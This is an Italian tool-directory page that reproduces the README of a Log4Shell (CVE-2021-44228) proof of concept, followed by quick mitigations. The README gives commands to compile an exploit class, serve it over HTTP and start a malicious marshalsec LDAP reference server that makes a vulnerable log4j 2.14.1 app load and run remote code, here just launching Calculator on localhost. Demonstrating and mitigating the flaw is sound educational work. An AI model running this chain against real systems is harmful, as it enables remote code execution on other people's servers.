Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-44228-PoC — CVE-2021-44228 (Log4Shell) Prova di concetto | Kitploit
Strumenti/GitHubGitHub/sunnyvale-it/cve-2021-44228-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubsunnyvale-it/cve-2021-44228-poc

CVE-2021-44228-PoC

CVE-2021-44228 (Log4Shell) Prova di concetto

Vedi Repository
8544 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-44228 (Log4Shell) Prova di Concetto

Le funzionalità JNDI di Apache Log4j2 <=2.14.1 utilizzate nella configurazione, nei messaggi di log e nei parametri non proteggono contro endpoint LDAP controllati dall'attaccante e altri endpoint correlati a JNDI. Un attaccante che può controllare i messaggi di log o i parametri dei messaggi di log può eseguire codice arbitrario caricato da server LDAP quando la sostituzione dei lookup nei messaggi è abilitata.

Per aiutare i clienti a capire come funziona questa vulnerabilità, abbiamo preparato questo repository con una Prova di Concetto semplice ma funzionante.

Prerequisiti

Avere installato localmente:

  • Git
  • JDK 11
  • Maven
  • Python

Al momento, il codice arbitrario avvia l'applicazione Calcolatrice su macOS o Windows, quindi solo questi due sistemi operativi sono supportati da questa PoC.

Dichiarazione di non responsabilità

Tutte le informazioni e il codice sono forniti esclusivamente a scopo educativo e/o per testare i propri sistemi per questa vulnerabilità.

La tecnica di attacco

Questa PoC assomiglia a quella descritta nell'immagine qui sotto (crediti GovCERT.ch), a parte il server vulnerabile che è solo una semplice classe Java per semplicità. È importante capire che questa vulnerabilità può essere innescata in vari modi; ciò che viene descritto è solo uno di essi.

Come eseguire il PoC

Clona questo repository

root@kitploit:~
terminal1 $ git clone https://github.com/sunnyvale-it/CVE-2021-44228-PoC.git

Compila l'exploit (usando JDK 11)

root@kitploit:~
terminal1 $ javac Exploit.java

Avvia un server HTTP per servire l'exploit

root@kitploit:~
terminal1 $ python -m SimpleHTTPServer 8888 --directory .

Avvia il server LDAPRefServer malevolo (grazie a https://github.com/mbechler/marshalsec)

root@kitploit:~
terminal2 $ java -cp tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

Avvia l'applicazione vulnerabile (contenente log4j 2.14.1)

root@kitploit:~
terminal3 $ mvn package && mvn exec:exec

Se tutto è andato a buon fine, l'applicazione Calcolatrice (esecuzione di codice arbitrario) dovrebbe apparire.

Mitigazioni rapide (funzionano su versioni Log4J dalla 2.10.0 alla 2.14.1)

Imposta la variabile d'ambiente LOG4J_FORMAT_MSG_NO_LOOKUPS a true

root@kitploit:~
terminal3 $ export LOG4J_FORMAT_MSG_NO_LOOKUPS=true 
root@kitploit:~
terminal3 $ mvn package && mvn exec:exec

In questo caso la Calcolatrice non dovrebbe più apparire

Esegui l'applicazione con la proprietà di sistema log4j2.formatMsgNoLookups impostata a true

root@kitploit:~
terminal3 $ mvn package && mvn exec:exec -Dlog4j2.formatMsgNoLookups=true

In questo caso la Calcolatrice non dovrebbe più apparire

Scarica lo strumento